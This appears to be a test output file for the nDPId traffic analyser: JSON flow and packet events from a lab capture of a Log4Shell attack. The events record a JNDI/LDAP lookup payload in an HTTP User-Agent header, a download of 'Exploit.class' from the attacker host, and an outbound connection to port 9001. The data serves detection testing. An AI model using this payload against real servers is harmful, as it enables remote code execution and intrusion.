00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADxjYEAAPQamLqwQ7gGsEO4KB8AfkHmWgrEAAAAAoAL68JU2AAACBAW0BAIICq34shoAAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1639425815407,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815407,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADwAAEAAQAYGj6wQ7gqsEO4BH5AHwIo9\/lB5loKyoBJxIDRcAAACBAW0BAIICmhBAYSt+LIaAQMDBw=="}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1639425815408,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815408,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADRjYUAAPQamNawQ7gGsEO4KB8AfkHmWgrKKPf5RgBAB9sqWAAABAQgKrfiyHGhBAYQ="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815407,"flow_last_seen":1639425815415,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":646,"flow_tot_l4_payload_len":646,"flow_avg_l4_payload_len":161,"midstream":0,"thread_ts_msec":1639425815415,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.10","src_port":1984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"192.168.13.31","url":"192.168.13.31:8080\/log4shell\/login","code":0,"content_type":"","user_agent":"jndi:ldap:\/\/172.16.238.11:1389\/a"}}
00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAABAkKsEO4KrBDuCgAAAAAAAKwQ7gs="}
00196{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425815682}
00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815415,"pkt":"AAAAAQAGAkKsEO4LAAAIBgABCAAGBAACAkKsEO4LrBDuCwJCrBDuCqwQ7go="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="}
00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
01058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815682,"flow_last_seen":1639425815682,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815682,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1639425815682,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815682,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADycRUAAQAZqP6wQ7gqsEO4L4TIFbQLNSvsAAAAAoAJyEDRmAAACBAW0BAIICvIpEmgAAAAAAQMDBw=="}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1639425815683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815683,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hMnt33KkCzUr8oBJxIDRmAAACBAW0BAIICingw2TyKRJoAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1639425815683,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815683,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADScRkAAQAZqRqwQ7gqsEO4L4TIFbQLNSvx7d9yqgBAA5TReAAABAQgK8ikSaCngw2Q="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815682,"flow_last_seen":1639425815692,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":14,"flow_tot_l4_payload_len":14,"flow_avg_l4_payload_len":3,"midstream":0,"thread_ts_msec":1639425815692,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57650,"dst_port":1389,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"LDAP","breed":"Acceptable","category":"System"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815910,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815910,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADzhTUAAQAYlN6wQ7gqsEO4LvTwAUKwpPLEAAAAAoAJyEDRmAAACBAW0BAIICvIpE0sAAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815910,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KAFC9PH3sGAysKTyyoBJxIDRmAAACBAW0BAIICingxEfyKRNLAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1639425815910,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815910,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADThTkAAQAYlPqwQ7gqsEO4LvTwAUKwpPLJ97BgNgBAA5TReAAABAQgK8ikTSyngxEc="}
00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1639425815910,"flow_last_seen":1639425815913,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1639425815913,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":0,"content_type":"","user_agent":"Java\/1.8.0_51"}}
01058{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1639425815910,"flow_last_seen":1639425815916,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1639425815916,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":48444,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"172.16.238.11","url":"172.16.238.11\/Exploit.class","code":200,"content_type":"application\/java-vm","user_agent":"Java\/1.8.0_51"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425815944,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425815944,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADw8h0AAQAZP8awQ7goKCgof2HAjKVh5kSAAAAAAoAJyEK5yAAACBAW0BAIICq5YAo8AAAAAAQMDBw=="}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIAEUAADwAAEAAQAaMeAoKCh+sEO4KIynYcLp2lFRYeZEhoBJxIK5yAAACBAW0BAIICiCvi5+uWAKPAQMDBw=="}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1639425815944,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADQ8iEAAQAZP+KwQ7goKCgof2HAjKVh5kSG6dpRVgBAA5a5qAAABAQgKrlgCjyCvi58="}
00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869}
00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAAAAQAGAkJ2jzQWAAAIBgABCAAGBAABAkJ2jzQWrBDuAQAAAAAAAKwQ7go="}
00197{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":113,"packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","protocol":2054,"global_ts_msec":1639425820869}
00342{"packet_event_id":1,"packet_event_name":"packet","packet_id":36,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":44,"pkt_type":2054,"pkt_l3_offset":16,"pkt_l4_offset":0,"pkt_len":44,"pkt_l4_len":0,"thread_ts_msec":1639425815944,"pkt":"AAQAAQAGAkKsEO4KAAAIBgABCAAGBAACAkKsEO4KrBDuCgJCdo80FqwQ7gE="}
00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":65,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1639425815944,"flow_last_seen":1639425823295,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":1,"midstream":0,"thread_ts_msec":1639425823295,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"10.10.10.31","src_port":55408,"dst_port":9001,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1639425834628,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1639425834628,"l3_proto":"ip4","src_ip":"172.16.238.10","dst_ip":"172.16.238.11","src_port":57742,"dst_port":1389,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADxNdkAAQAa5DqwQ7gqsEO4L4Y4FbXfaWIQAAAAAoAJyEDRmAAACBAW0BAIICvIpXGkAAAAAAQMDBw=="}
00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1639425834628,"pkt":"AAAAAQAGAkKsEO4LAAAIAEUAADwAAEAAQAYGhawQ7gusEO4KBW3hjinD15132liFoBJxIDRmAAACBAW0BAIICinhDWbyKVxpAQMDBw=="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"log4j-webapp-exploit.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1639425834628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1639425834628,"pkt":"AAQAAQAGAkKsEO4KAAAIAEUAADRNd0AAQAa5FawQ7gqsEO4L4Y4FbXfaWIUpw9eegBAA5TReAAABAQgK8ilcainhDWY="}
